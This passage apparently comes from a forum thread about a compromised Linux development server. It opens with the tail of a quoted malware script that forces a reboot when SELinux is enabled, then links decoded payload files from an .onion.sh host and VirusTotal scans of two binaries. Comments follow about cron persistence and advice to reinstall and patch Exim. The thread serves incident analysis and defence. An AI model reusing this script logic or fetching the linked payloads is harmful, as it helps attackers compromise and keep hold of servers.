    if echo "$(sestatus -v  2>/dev/null| head -n 1)"|grep -q 'enabled'; then ${sudo} shutdown -r now >/dev/null 2>&1; ${sudo} reboot -f >/dev/null 2>&1; fi
fi
```

The "an7kmd2wp4xo7hpr.onion.sh/src/main" file content (base64 decoded):
https://pastebin.com/qMDecdX1

The "an7kmd2wp4xo7hpr.onion.sh/src/sc" file content (base64 decoded):
https://pastebin.com/uA1A25wB

And the VT scan of the 2 binary files:

"a64x75" => https://www.virustotal.com/gui/file/f1f7ec059f1fb22472d7308648ff9aa02878cf48da7dfc17b89d805df7da7687/detection

"r64x75" =>  https://www.virustotal.com/gui/file/c3f26f38cb75cf779eed36a4e7ac32cacd4ae89bdf7dae2a4c4db1afe652d3f0/detection

Comment: Good. Ok... Lets keep calm here... Cause I'm panicking.. That's a development server and I don't mind losing any data of it. So it's fine. I can even reset it but I'd like to use the chance to learn stuff. So is there a way for me to figure out how to block it from reappearing in cron? I mean... do they know my root password? And how did they figure my ssh port? Just to update, The cron keeps reappearing in the crontab

Comment: The most secure way if you don't care about the data, is to format, because if we can see what the current scripts are doing, we can't know what was done before or manually. So format and install a clean system. Not forget to check that Exim, if you use it, is up to date and patched, or any other software affected by recent 0days and running on your server(s). And learn preventive security, like I'm trying to do too ;)
And registering to a newsletter or a site that keep updates of those vulnerabilities to not miss any is not a bad idea.